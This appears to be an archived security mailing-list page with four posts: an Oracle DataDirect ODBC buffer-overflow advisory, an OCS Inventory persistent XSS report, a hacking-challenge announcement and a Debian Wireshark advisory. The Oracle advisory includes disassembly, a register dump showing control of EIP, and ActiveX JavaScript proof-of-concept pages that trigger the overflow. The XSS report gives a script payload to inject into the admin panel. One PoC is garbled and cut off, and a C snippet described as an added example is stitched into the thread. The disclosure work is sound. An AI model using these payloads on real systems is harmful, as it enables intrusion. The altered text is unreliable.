Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability

2011-10-20 Thread nospam
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute 
Stack Based Buffer Overflow Vulnerability

tested against: Microsoft Windows 2k3 r2 sp2
Oracle Hyperion Performance Management and BI (v11.1.2.1.0)

download url of the Oracle Hyperion suite:
http://www.oracle.com/technetwork/middleware/epm/downloads/index.html

files tested:
SystemInstaller-11121-win32.zip
FoundationServices-11121-win32-Part1.zip
FoundationServices-11121-win32-Part2.zip
FoundationServices-11121-win32-Part3.zip
FoundationServices-11121-win32-Part4.zip
FoundationServices-11121-Part5.zip
FoundationServices-11121-Part6.zip
FoundationServices-11121-Part7.zip
StaticContent-11121.zip
RandAFoundation-11121.zip
EPM_Architect-11121.zip

Vulnerability:

The mentioned product installs various drivers to allow
the software to get information from ODBC data sources.
Some of them are vulnerable to a remote stack-based buffer 
overflow which can be triggered by specifying an overlong
HOST attribute inside the connection string. The software
tries to do a Unicode/ASCII conversion. 
In doing this, the stack is completely smashed,
allowing redirection of the execution flow to a user-supplied buffer.

Analysis for (*) and errata corrige, too many nights awake:
When receiving the attribute, arsqls24.dll 
does a Unicode/ASCII conversion; this fragment of code
counts the number of bytes needed and stores it in eax
..
01D45C10   83C1 02  add ecx,2
01D45C13   83C0 01  add eax,1
01D45C16   66:8339 00   cmp word ptr ds:[ecx],0
01D45C1A  ^75 F4jnz short ARSQLS24.01D45C10
..
the next operation is a copy loop which moves the needed
bytes to a memory region pointed to by ecx, trusting the 
eax counter.
..
01D48C36   8A16 mov dl,byte ptr ds:[esi]
01D48C38   83E8 01  sub eax,1
01D48C3B   8811 mov byte ptr ds:[ecx],dl
01D48C3D   83C1 01  add ecx,1
01D48C40   83C6 02  add esi,2
01D48C43   85C0 test eax,eax
01D48C45  ^75 EFjnz short ARSQLS24.01D48C36
..
The memory region pointed to by ecx is adjacent to critical
structures (stack pointers), so when the HOST attribute
is an overlong string the stack is partially overwritten
with user-supplied values. The result, after a few steps:

EAX 
ECX 0003
EDX 02B52E88
EBX 0013C720 ASCII 
AA
ESP 0013C720 ASCII 
AA
EBP 0013D1A4
ESI 02B56FF8
EDI 0001
EIP 41414141
C 0  ES 0023 32bit 0()
P 1  CS 001B 32bit 0()
A 0  SS 0023 32bit 0()
Z 0  DS 0023 32bit 0()
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS  NULL
D 0
O 0  LastErr WSAHOST_NOT_FOUND (2AF9)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
MM0    
MM1    
MM2    
MM3    
MM4    
MM5    
MM6 8000   
MM7 FEE0   

poc:

The underlying operating system contains the ADODB Connection
ActiveX control which is marked safe for initialization
and safe for scripting (implements the IObjectSafety interface)
which could allow a remote attacker to specify the
mentioned connection string. 

The IE security settings do not allow opening a connection
from another domain but this can be used in conjunction 
with an XSS vulnerability, connection string pollution or 
SQL injection vulnerabilities or through specific configuration
files. Note also that I am mentioning the ADODB object for pure
commodity: when installed, the ODBC drivers are available 
systemwide, so this is a good basis for remote privilege elevations
of many kinds. 

Note that Internet Explorer does not crash when trying to
execute EIP; attach a tool like faultmon to the IE sub-process.

(*)
<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x=""; for (i=0;i<666;i++){x = x + "A"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 SQL Server Native Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=xx;UID=sa;PWD=null";
obj.Open();
</script>

<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x=""; for (i=0;i<1666;i++){x = x + "A"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null";
obj.Open();
</script>

!-- saved from url=(0014)about:internet -- 
script
var obj = new ActiveXObject(ADODB.Connection);
x=; for (i=0;i1666;i++){x = x + }
obj.ConnectionString =DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST= + x 
+ 
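
The count-then-copy pattern described in the analysis above, as an added example in C that is not part of the original post: a length count over a UTF-16 HOST value (what the first disassembly fragment computes) followed by a narrowing copy that checks the destination capacity instead of trusting the counter alone. The 64-byte buffer size and the 4096-unit source limit are constructed for the example, not values from the driver.

```c
#include <stddef.h>
#include <stdint.h>

#define HOST_BUF 64   /* constructed size of a fixed stack buffer; not the driver's real size */

/* Count UTF-16 code units before the NUL terminator. This is what the
 * advisory's first loop (add ecx,2 / add eax,1 / cmp word [ecx],0) computes. */
size_t utf16_len(const uint16_t *s)
{
    size_t n = 0;
    while (s[n] != 0)
        n++;
    return n;
}

/* Narrowing copy that checks capacity. The advisory's copy loop trusts the
 * count alone and never consults the destination size; here an input that
 * does not fit (including the terminator) is rejected instead of overrunning
 * dst. Returns the number of bytes written, or -1 when src does not fit. */
int narrow_bounded(char *dst, size_t dstsize, const uint16_t *src)
{
    size_t n = utf16_len(src);
    if (dstsize == 0 || n >= dstsize)
        return -1;
    for (size_t i = 0; i < n; i++)
        dst[i] = (char)(src[i] & 0xFF);   /* keep the low byte, as the driver does */
    dst[n] = '\0';
    return (int)n;
}

/* Build a constructed HOST value of n repeated code units 'c' (the PoCs use
 * 666 and 1666 repetitions) and run it through the bounded copy into a
 * HOST_BUF-sized stack buffer. Returns narrow_bounded's result so a caller
 * can see whether the value was accepted (>= 0) or rejected (-1). */
int demo_host(size_t n, char c)
{
    static uint16_t src[4096];        /* constructed source limit for the demo */
    char host[HOST_BUF];
    if (n >= sizeof src / sizeof src[0])
        return -1;
    for (size_t i = 0; i < n; i++)
        src[i] = (uint16_t)(unsigned char)c;
    src[n] = 0;
    return narrow_bounded(host, sizeof host, src);
}
```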

OCS Inventory NG 2.0.1 Persistent XSS (CVE-2011-4024)

2011-10-20 Thread Nicolas DEROUET
OCS Inventory NG 2.0.1 Persistent XSS (CVE-2011-4024)
---

Software      : Open Computer and Software (OCS) Inventory NG
Download      : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Discovered    : 2011-10-04
Published     : 2011-10-05
Version       : 2.0.1 and prior
Impact        : Persistent XSS
Remote        : Yes (No authentication is needed)
CVE-ID        : CVE-2011-4024


Info
----

Open Computer and Software (OCS) Inventory Next Generation (NG) is an
application designed to help a network or system administrator keep track
of the configuration and installed software of the computers on the network.


Details
---

The vulnerability is in the data sent by the OCS agent. The inventory service
and the admin panel do not validate the data received. An attacker could inject
malicious HTML/JS into the inventory information (e.g. the computer
description field under WinXP). This data is printed in the admin panel, which
can lead to a session hijack or whatever you want.


PoC
---

1. Enter the XSS script (e.g.
   <script>alert(String.fromCharCode(88,83,83))</script>)
   in the computer description field. (WinXP > System Properties > Computer
   Name > Computer Description)

2. Launch an inventory with OCS Agent

3. Go on the admin panel (http://SERVER/ocsreports/)

4. View your computer detail

Tested on : OCS Agent 2.0.1 (WinXP SP3) and OCS Server 2.0.1 (Windows).
Not tested on : Linux platform and GLPI (OCS import)


Solution
--------

Upgrade to OCS Inventory NG 2.0.2


GotRoot Security Challenge

2011-10-20 Thread Ivan Buetler
Hi all,

We are proud to present a new free hacking challenge! It's all about
getting root on a Linux host! This time, we will provide a target host
which you will access with ssh, and your goal is to disclose the /root/secret.txt file.
Increase your knowledge about restricted environments and bypassing
them; enjoy this free event! 


Interested? Please sign up for a Hacking-Lab account and register yourself
(free) for the Hacking Challenge classroom. 
* https://www.hacking-lab.com/events/

Direct registration URL
* https://www.hacking-lab.com/events/registerform.html?eventid=199

Other Challenges
* There are other challenges available in the same classroom
* Web Security challenges and more ..

Regards
Ivan Buetler / E1
Compass Security, Switzerland



[SECURITY] [DSA 2324-1] wireshark security update

2011-10-20 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

------------------------------------------------------------------------
Debian Security Advisory DSA-2324-1                   secur...@debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
October 20, 2011                       http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: wireshark
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-3360 

The Microsoft Vulnerability Research group discovered that insecure
load path handling could lead to execution of arbitrary Lua script code.

For the oldstable distribution (lenny), this problem has been fixed in
version 1.0.2-3+lenny15. This build will be released shortly.

For the stable distribution (squeeze), this problem has been fixed in
version 1.2.11-6+squeeze4.

For the unstable distribution (sid), this problem has been fixed in
version 1.6.2-1.

We recommend that you upgrade your wireshark packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk6gejgACgkQXm3vHE4uylpyVQCg42CjnLYSmkZAXRA893RRPvVd
VnoAoKQyv6Bp7DcLxOuQ4HWeezkIhJ2/
=Ukxm
-END PGP SIGNATURE-